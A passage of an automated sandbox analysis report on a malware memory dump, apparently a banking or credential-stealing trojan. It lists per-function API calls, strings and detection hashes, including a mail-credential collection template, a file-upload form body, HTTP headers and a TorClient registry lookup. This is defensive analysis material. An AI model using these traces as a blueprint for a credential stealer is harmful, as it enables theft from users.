lstrcmpi.KERNEL32(00000002,?), ref: 00B2AC31
memcpy.NTDLL(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00B1AF7F,?,00000000), ref: 00B2AC45
HeapFree.KERNEL32(00000000,00000000,Blocked,00000000,?,00000000,?,?,?,?,?,?,?,00B1AF7F,?,00000000), ref: 00B2AC84

Strings

Blocked, xrefs: 00B2ABB3, 00B2AC68

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
String ID: Blocked
API String ID: 733514052-367579676
Opcode ID: 4df244f785d65ec276efa35d534d81073d31dce1bf20c34ba0adab583d8d5d8b
Instruction ID: aef83c4a71e905f2d685f5c02053cb37771f4608a6714e84df106328533310ff
Opcode Fuzzy Hash: 4df244f785d65ec276efa35d534d81073d31dce1bf20c34ba0adab583d8d5d8b
Instruction Fuzzy Hash: 1121F771910228BFCB10AFA4EC85A9E7FF9FF04750F2440A8F909A3250DB709D45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B23166, Relevance: 10.6, APIs: 7, Instructions: 82stringfileCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00000000), ref: 00B2317E
lstrcmpiW.KERNEL32(00000000,0065002E), ref: 00B231B5
lstrcmpiW.KERNEL32(?,0064002E), ref: 00B231CA
lstrlenW.KERNEL32(?), ref: 00B231D1
CloseHandle.KERNEL32(?), ref: 00B231F9
DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 00B23225
RtlLeaveCriticalSection.NTDLL(00000000), ref: 00B23242

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
String ID:
API String ID: 1496873005-0
Opcode ID: 31b3691caea7ae61e944d31e3c330878f11b5b07fecb06305254774c303650ff
Instruction ID: d2e67961e0b067a8b156effd9c8622abff2867ed3759fc4fe172e08ea70856ed
Opcode Fuzzy Hash: 31b3691caea7ae61e944d31e3c330878f11b5b07fecb06305254774c303650ff
Instruction Fuzzy Hash: 33211B71600315EBDB10AFB5ED84EAE77FCEF14B41B2400A5B90AE3151EF74EA098B61

Uniqueness

Uniqueness Score: -1.00%

Function 00B24344, Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00B1436A,00000000,00B3E260,00B3E280,?,?,00B1436A,00B1AB0F,00B3E260), ref: 00B24354
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00B2436A
lstrlen.KERNEL32(00B1AB0F,?,?,00B1436A,00B1AB0F,00B3E260), ref: 00B24372
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B2437E
lstrcpy.KERNEL32(00B3E260,00B1436A), ref: 00B24394
HeapFree.KERNEL32(00000000,00000000,?,?,00B1436A,00B1AB0F,00B3E260), ref: 00B243E8
HeapFree.KERNEL32(00000000,00B3E260,?,?,00B1436A,00B1AB0F,00B3E260), ref: 00B243F7

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$lstrcpy
String ID:
API String ID: 1531811622-0
Opcode ID: ee79c20f0aa4dd0239a614e59d04a6febd84278757857275b9e83c1611ae5c17
Instruction ID: d82ab3cee8235ed6181ce09c7a76bd3e998966b749a450d64318519b4202172e
Opcode Fuzzy Hash: ee79c20f0aa4dd0239a614e59d04a6febd84278757857275b9e83c1611ae5c17
Instruction Fuzzy Hash: C521D431104258BFEB228F68EC84F6E7FAAFF46340F2440A8F48997261CB719C16C764

Uniqueness

Uniqueness Score: -1.00%

Function 00B186ED, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000001,770EEB70), ref: 00B1870D

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

wsprintfA.USER32 ref: 00B18737

Part of subcall function 00B2A1FF: GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00B3470F), ref: 00B2A215
Part of subcall function 00B2A1FF: wsprintfA.USER32 ref: 00B2A23D
Part of subcall function 00B2A1FF: lstrlen.KERNEL32(?), ref: 00B2A24C
Part of subcall function 00B2A1FF: wsprintfA.USER32 ref: 00B2A28C
Part of subcall function 00B2A1FF: wsprintfA.USER32 ref: 00B2A2C1
Part of subcall function 00B2A1FF: memcpy.NTDLL(00000000,?,?), ref: 00B2A2CE
Part of subcall function 00B2A1FF: memcpy.NTDLL(00000008,00B383E4,00000002,00000000,?,?), ref: 00B2A2E3
Part of subcall function 00B2A1FF: wsprintfA.USER32 ref: 00B2A306

HeapFree.KERNEL32(00000000,?,?,?,?), ref: 00B187AC

Part of subcall function 00B35E4D: RtlEnterCriticalSection.NTDLL(05778D20), ref: 00B35E63
Part of subcall function 00B35E4D: RtlLeaveCriticalSection.NTDLL(05778D20), ref: 00B35E7E

HeapFree.KERNEL32(00000000,?,?,00000000,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 00B18794
HeapFree.KERNEL32(00000000,?), ref: 00B187A0

Strings

Content-Type: application/octet-stream, xrefs: 00B18729
Content-Disposition: form-data; name="upload_file"; filename="%s", xrefs: 00B18731

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
String ID: Content-Disposition: form-data; name="upload_file"; filename="%s"$Content-Type: application/octet-stream
API String ID: 3553201432-2405033784
Opcode ID: 1ad855214c6bacc1ff07ae42484ba4b21399c33531265e2d7a9eb99ba184f036
Instruction ID: ec7a0c4820ac54b064cb136a2220a66a965cb9c152e80cb044a026da18286892
Opcode Fuzzy Hash: 1ad855214c6bacc1ff07ae42484ba4b21399c33531265e2d7a9eb99ba184f036
Instruction Fuzzy Hash: 8B213776800259BBCF129F95DC84CCFBFB9FF88300F204466F915A2160DB719A60DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B261ED, Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 72stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,73B75520,?,00000000,?,?,00B2F520,?,00000000,?,00000000,00000000,?,?,?,?), ref: 00B261FE

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

Part of subcall function 00B26635: memset.NTDLL ref: 00B2663D

Part of subcall function 00B17D07: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,00B18663,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,00B21117), ref: 00B17D13
Part of subcall function 00B17D07: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00B18663,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 00B17D71
Part of subcall function 00B17D07: lstrcpy.KERNEL32(00000000,00000000), ref: 00B17D81

lstrcpy.KERNEL32(00000038,?), ref: 00B26239

Strings

Connection:, xrefs: 00B26275
Accept-Encoding:, xrefs: 00B26261
User-Agent:, xrefs: 00B2626B
Host:, xrefs: 00B26257
GET, xrefs: 00B2624D

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocateHeapmemcpymemset
String ID: Accept-Encoding:$Connection:$GET$Host:$User-Agent:
API String ID: 3405161297-3467890120
Opcode ID: e190ee9bfdfe7531056721497b2df3132de15a69f226787d292605890a8a4c9f
Instruction ID: a417e98aec5c5a410f91524dccf68b7d45cb2965d1f2518ff35fb1a663eae697
Opcode Fuzzy Hash: e190ee9bfdfe7531056721497b2df3132de15a69f226787d292605890a8a4c9f
Instruction Fuzzy Hash: 9A118871600216FA8B017FA5FE8ADBF7BECEE80384B1000B6F518E6121CEB4DA40D661

Uniqueness

Uniqueness Score: -1.00%

Function 00B26572, Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B28800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28812
Part of subcall function 00B28800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B2882B
Part of subcall function 00B28800: GetCurrentThreadId.KERNEL32 ref: 00B28838
Part of subcall function 00B28800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28844
Part of subcall function 00B28800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28852
Part of subcall function 00B28800: lstrcpy.KERNEL32(00000000), ref: 00B28874

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,00000000,00000000,?,00000000,00B22EC9,?), ref: 00B265B3
HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,00000000,00000000,?,00000000,00B22EC9,?,00000000,?,00000000,?,?), ref: 00B26626

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
String ID:
API String ID: 2078930461-0
Opcode ID: bc38306f2b2ae08ffa145e652cf2fc824cd3e256057896cfae84621239ff9e44
Instruction ID: 8b4af1c31385931ac6d861ac403eed66a32ae57e4e5c02fb046fe32ce8fac5be
Opcode Fuzzy Hash: bc38306f2b2ae08ffa145e652cf2fc824cd3e256057896cfae84621239ff9e44
Instruction Fuzzy Hash: FA11C131181328BBD3322B61BC89FAF3F9DEB45760F200560F60A961E1DE624858C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00B2A378, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B11791: lstrlen.KERNEL32(00000000), ref: 00B117F8
Part of subcall function 00B11791: sprintf.NTDLL ref: 00B11819

lstrlen.KERNEL32(00000000,00000000,73BB81D0,00000000,?,?,00B34BA0,00000000,05778D60), ref: 00B2A3A3
lstrlen.KERNEL32(?,?,?,00B34BA0,00000000,05778D60), ref: 00B2A3AB

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

strcpy.NTDLL ref: 00B2A3C2
lstrcat.KERNEL32(00000000,?), ref: 00B2A3CD

Part of subcall function 00B21250: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00B2A3DC,00000000,?,?,?,00B34BA0,00000000,05778D60), ref: 00B21267

Part of subcall function 00B24FB0: RtlFreeHeap.NTDLL(00000000,00000200,00B26EB2,00000000,00000100,00000200), ref: 00B24FBC

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00B34BA0,00000000,05778D60), ref: 00B2A3EA

Part of subcall function 00B2530B: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00B2A3F6,00000000,?,?,00B34BA0,00000000,05778D60), ref: 00B25315
Part of subcall function 00B2530B: _snprintf.NTDLL ref: 00B25373

Strings

=, xrefs: 00B2A3E4

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: d1b3d36b4480472d6f04f9451c6f61472bf0f8d9003e6fb8343dec0049fde4cf
Instruction ID: e67f15f01fb278b5f8f552cdbf5008ebec9469b73668cf5274de282cfaf6fae8
Opcode Fuzzy Hash: d1b3d36b4480472d6f04f9451c6f61472bf0f8d9003e6fb8343dec0049fde4cf
Instruction Fuzzy Hash: E21191329006347B86127BA4BC89CAF7ADDDF897643150095F60CA7206DFB4DD0257E5

Uniqueness

Uniqueness Score: -1.00%

Function 00B16229, Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 00B1625A
wcstombs.NTDLL ref: 00B1626B

Part of subcall function 00B180B6: StrChrA.SHLWAPI(?,0000002E,?,?,?,00000000,00B16281,00000000), ref: 00B180C8
Part of subcall function 00B180B6: StrChrA.SHLWAPI(?,00000020,?,?,00000000,00B16281,00000000), ref: 00B180D7

OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 00B1628C
TerminateProcess.KERNEL32(00000000,00000000), ref: 00B1629B
CloseHandle.KERNEL32(00000000), ref: 00B162A2
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00B162B1
WaitForSingleObject.KERNEL32(00000000), ref: 00B162C1

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
String ID:
API String ID: 417118235-0
Opcode ID: 038b8a9012ec368565757b1fc62e3b4b09ce517ee7572ffcf8bf4635e163304a
Instruction ID: f0267e332a65188e863d3536b7661fde15f63917a22ab836e5e2068b7f8821f6
Opcode Fuzzy Hash: 038b8a9012ec368565757b1fc62e3b4b09ce517ee7572ffcf8bf4635e163304a
Instruction Fuzzy Hash: 6811BC31200615BBE7115B94EC89BAE7BAAFF04701F600054FA04A71A0CFB5ED98CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00B21E61, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00B145A1,00000000,00000000,00000000,?,?,00B311A1,00B145A1,00000000), ref: 00B21E7C
lstrlen.KERNEL32( | "%s" | %u,?,?,00B311A1,00B145A1,00000000), ref: 00B21E87
RtlAllocateHeap.NTDLL(00000000,00000029), ref: 00B21E98

Part of subcall function 00B1AB88: GetLocalTime.KERNEL32(?,?,?,?,00B2201B,00000000,00000001), ref: 00B1AB92
Part of subcall function 00B1AB88: wsprintfA.USER32 ref: 00B1ABC5

wsprintfA.USER32 ref: 00B21EBB

Part of subcall function 00B19A6E: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,00B21EE3,00000000,00000000,00000000,00000000,00000006,?,?,?,00000000), ref: 00B19A8C
Part of subcall function 00B19A6E: wsprintfA.USER32 ref: 00B19AAA

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000006,?,?,?,00000000), ref: 00B21EEC

Strings

| "%s" | %u, xrefs: 00B21E7E, 00B21E83, 00B21EB6

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
String ID: | "%s" | %u
API String ID: 3847261958-3278422759
Opcode ID: 9e4a8ed2052f5399fd36d74a18c1b48a32acf391b8ba2f2ec1da69774497ed44
Instruction ID: c1e3e5cd73f9068302c91e06a30062a0b41e641fd8a5adf4b0495899483d039b
Opcode Fuzzy Hash: 9e4a8ed2052f5399fd36d74a18c1b48a32acf391b8ba2f2ec1da69774497ed44
Instruction Fuzzy Hash: 0511A031900218BFDB11AB69EC89DAF7BADEF84354B200062FD08D3120DE319D55DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B23BE4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringtimeCOMMON

Download Yara Rule

APIs

lstrcmpi.KERNEL32(00000000,Main), ref: 00B23C05
RtlEnterCriticalSection.NTDLL(00B3E268), ref: 00B23C17
RtlLeaveCriticalSection.NTDLL(00B3E268), ref: 00B23C2A
lstrcmpi.KERNEL32(00B3E280,00000000), ref: 00B23C4B
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B16BE5,00000000), ref: 00B23C5F

Strings

Main, xrefs: 00B23BFD

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
String ID: Main
API String ID: 1266740956-521822810
Opcode ID: c252f5082b9fc76f3c2607980ad3e7b82b23e7bb4ae53621facc797cbbf968c2
Instruction ID: d2daeb0da7051787097ae87bd0322247694e7ce8f51ff1340a9bb2ffbfbd92d6
Opcode Fuzzy Hash: c252f5082b9fc76f3c2607980ad3e7b82b23e7bb4ae53621facc797cbbf968c2
Instruction Fuzzy Hash: 46118171500318ABDB15CF29DC49A5EB7E8FB05724F2045AAE919A3290CB74EE01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B2C747, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B28800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28812
Part of subcall function 00B28800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B2882B
Part of subcall function 00B28800: GetCurrentThreadId.KERNEL32 ref: 00B28838
Part of subcall function 00B28800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28844
Part of subcall function 00B28800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28852
Part of subcall function 00B28800: lstrcpy.KERNEL32(00000000), ref: 00B28874

lstrcpy.KERNEL32(-000000FC,00000000), ref: 00B2C781
CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,00B1EF96,?,?,?), ref: 00B2C793
GetTickCount.KERNEL32 ref: 00B2C79E
GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,00B1EF96,?,?,?), ref: 00B2C7AA
lstrcpy.KERNEL32(00000000), ref: 00B2C7C4

Strings

\Low, xrefs: 00B2C773

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
String ID: \Low
API String ID: 1629304206-4112222293
Opcode ID: 497cabfddb125214eacb586bbaa0adc5abb3b09029c75b31632041785d48f259
Instruction ID: 4d10f3876f1cd395809c7691ed8005c0cbb81f724704445fbd8699ef612df8db
Opcode Fuzzy Hash: 497cabfddb125214eacb586bbaa0adc5abb3b09029c75b31632041785d48f259
Instruction Fuzzy Hash: 6A01F1312016316BD2112B79BC88F6F7BDCEF46741F2106A1F508D71A0CF28DD018AB9

Uniqueness

Uniqueness Score: -1.00%

Function 00B2A67C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 00B2A693

Part of subcall function 00B23587: wcstombs.NTDLL ref: 00B23645

lstrlen.KERNEL32(?,?,?,?,?,00B308C4,?,?), ref: 00B2A6B6
lstrlen.KERNEL32(?,?,?,?,00B308C4,?,?), ref: 00B2A6C0
memcpy.NTDLL(?,?,00004000,?,?,00B308C4,?,?), ref: 00B2A6D1
HeapFree.KERNEL32(00000000,?,?,?,?,00B308C4,?,?), ref: 00B2A6F3

Strings

Access-Control-Allow-Origin:, xrefs: 00B2A681

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heaplstrlen$AllocateFreememcpywcstombs
String ID: Access-Control-Allow-Origin:
API String ID: 1256246205-3194369251
Opcode ID: 01e6d943f39361f6547309dc65383b044b5db71c4e3d59dd4659f992552c3715
Instruction ID: 8228a27ff4014df052f0d469abc951e7d5815b908ff8e1118a5627dca0b0ebdc
Opcode Fuzzy Hash: 01e6d943f39361f6547309dc65383b044b5db71c4e3d59dd4659f992552c3715
Instruction Fuzzy Hash: 9C118B76500214AFCB119F54EC85F5EBBF9FB95360F2440A8F90AA3260DB319D45DB25

Uniqueness

Uniqueness Score: -1.00%

Function 00B21B2B, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3134B: lstrlen.KERNEL32(?,00000008,00000000,?,73B75520,00B21372,?,?,00000000,00B11589,?,00000000,?,00B25B4A,?,00000001), ref: 00B3135A
Part of subcall function 00B3134B: mbstowcs.NTDLL ref: 00B31376

lstrlenW.KERNEL32(00000000,00000000,00000094,%APPDATA%\Microsoft\,00000000,?,?,00B1A164,?), ref: 00B21B50
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B21B62
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00B1A164,?), ref: 00B21B7F
lstrlenW.KERNEL32(00000000,?,?,00B1A164,?), ref: 00B21B8B
HeapFree.KERNEL32(00000000,00000000,?,?,00B1A164,?), ref: 00B21B9F

Strings

%APPDATA%\Microsoft\, xrefs: 00B21B30

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
String ID: %APPDATA%\Microsoft\
API String ID: 3403466626-2699254172
Opcode ID: 3558d4088dcba87be439144fbe829e584683acb822f8571ab381f071d473dd6f
Instruction ID: 3f78eb858f009f5952b3f30b34be1192a59011340b8f41661fb731e06029ac91
Opcode Fuzzy Hash: 3558d4088dcba87be439144fbe829e584683acb822f8571ab381f071d473dd6f
Instruction Fuzzy Hash: 31017C72501718BFE3119F98EC89FAE77ACEF05314F200051F505A7160DFB09D058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B21647, Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 208stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(142A03F6), ref: 00B2175E
lstrlen.KERNEL32(142903F0), ref: 00B2176C

Part of subcall function 00B250B0: lstrlen.KERNEL32(?,00000104,?,00000000,00B21744,142D03E9,?), ref: 00B250BB
Part of subcall function 00B250B0: lstrcpy.KERNEL32(00000000,?), ref: 00B250D7

Strings

SMTP, xrefs: 00B217F4
type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S, xrefs: 00B2181C
IMAP, xrefs: 00B21809, 00B2181B
POP3, xrefs: 00B21802

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$lstrcpy
String ID: IMAP$POP3$SMTP$type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S
API String ID: 805584807-1010173016
Opcode ID: bb47cba5ba1e264ab17e1f9c6f11daa76dde6ee534d94e5c3fb5fce069096dd3
Instruction ID: 7693fa8d4ba45aa2d98a5883e46b0f531e1554491fcc974760e63a1027b08a55
Opcode Fuzzy Hash: bb47cba5ba1e264ab17e1f9c6f11daa76dde6ee534d94e5c3fb5fce069096dd3
Instruction Fuzzy Hash: 60712871901129AFCB21DFA8E884AEEBBF8FF58704F1045A9F909A7210D7309E408F91

Uniqueness

Uniqueness Score: -1.00%

Function 00B2C50E, Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

GetLastError.KERNEL32(?,?,?,00001000,?,00B3E130,73BCF750), ref: 00B2C58F
WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00B3E130,73BCF750), ref: 00B2C614
CloseHandle.KERNEL32(00000000,?,00B3E130,73BCF750), ref: 00B2C62E
OpenProcess.KERNEL32(00100000,00000000,00000000,?,?,?,00B3E130,73BCF750), ref: 00B2C663

Part of subcall function 00B2408E: RtlReAllocateHeap.NTDLL(00000000,?,?,00B2804C), ref: 00B2409E

WaitForSingleObject.KERNEL32(?,00000064,?,00B3E130,73BCF750), ref: 00B2C6E5
CloseHandle.KERNEL32(F0FFC983,?,00B3E130,73BCF750), ref: 00B2C70C

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
String ID:
API String ID: 3115907006-0
Opcode ID: 06ea7311382f524e5efea10abf8577018e6211e4f8c68a5409f4a50dc6eb32e5
Instruction ID: 2d0e993903d47b559655c57e7151e750c75517b3b6455584eae05bb327e392a8
Opcode Fuzzy Hash: 06ea7311382f524e5efea10abf8577018e6211e4f8c68a5409f4a50dc6eb32e5
Instruction Fuzzy Hash: 4E810471900229EFCB11DF98D985AAEBBF5FF08340F248499E909AB251D731ED50DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B1991D, Relevance: 9.1, APIs: 6, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c0f92519a138e893f64f80a5ad4f3893e978c0c4ee180dc10bb79bb7160750f
Instruction ID: 53f8567ff8d5af913837ad24e7590bc9ec6cbbef3f11f79922969539629fb517
Opcode Fuzzy Hash: 6c0f92519a138e893f64f80a5ad4f3893e978c0c4ee180dc10bb79bb7160750f
Instruction Fuzzy Hash: 3A41F571600754AFD7209F299C859AB7BE8FF45360FA00A6DF5AAC31D0DB70A889CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00B30A16, Relevance: 9.1, APIs: 6, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

memset.NTDLL ref: 00B30A61
RtlEnterCriticalSection.NTDLL(00000008), ref: 00B30AD9
RtlLeaveCriticalSection.NTDLL(?), ref: 00B30AF1
GetLastError.KERNEL32(00B2209D,?,?), ref: 00B30B09
RtlEnterCriticalSection.NTDLL(?), ref: 00B30B15
RtlLeaveCriticalSection.NTDLL(?), ref: 00B30B24

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$AllocateErrorHeapLastmemset
String ID:
API String ID: 2000578454-0
Opcode ID: 3d6b52f589d7b9e9ac328bd3a30ad71be38b343e09440a1a73416cb8a8462327
Instruction ID: b57c13552b14aa23414e41c75ddc99d98b3bd886202c6ca33116887bad45b67b
Opcode Fuzzy Hash: 3d6b52f589d7b9e9ac328bd3a30ad71be38b343e09440a1a73416cb8a8462327
Instruction Fuzzy Hash: 9A416DB1900705EFD720EF69D884BAEBBF8FF08744F208559E559D7290E774AA44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B13828, Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON

Download Yara Rule

APIs

OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 00B13842
CreateWaitableTimerA.KERNEL32(00B3E0D4,00000003,?), ref: 00B1385F
GetLastError.KERNEL32(?,?,00B23A3F,?,?,?,00000000,?,?,?), ref: 00B13870

Part of subcall function 00B2672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,00B11CDF,00000000,00000000,?,?,00000000,?,?,?,00B11CDF,TorClient), ref: 00B26765
Part of subcall function 00B2672D: RtlAllocateHeap.NTDLL(00000000,00B11CDF), ref: 00B26779
Part of subcall function 00B2672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00B11CDF,?,?,?,00B11CDF,TorClient,?,?), ref: 00B26793
Part of subcall function 00B2672D: RegCloseKey.KERNELBASE(?,?,?,?,00B11CDF,TorClient,?,?), ref: 00B267BD

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00B23A3F,?,?,?,00B23A3F,?), ref: 00B138B0
SetWaitableTimer.KERNEL32(00000000,00B23A3F,00000000,00000000,00000000,00000000,?,?,00B23A3F,?), ref: 00B138CF
HeapFree.KERNEL32(00000000,00B23A3F,00000000,00B23A3F,?,?,?,00B23A3F,?), ref: 00B138E5

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
String ID:
API String ID: 1835239314-0
Opcode ID: 4ba8f99a2678d9ad7b5df7e2ff82cad1ef97b6f634cc8225ee125be586190485
Instruction ID: e5ccc9490dc76f2ae788c118a5a448c200a1e3a1fc2bede6e5af0541bb68a919
Opcode Fuzzy Hash: 4ba8f99a2678d9ad7b5df7e2ff82cad1ef97b6f634cc8225ee125be586190485
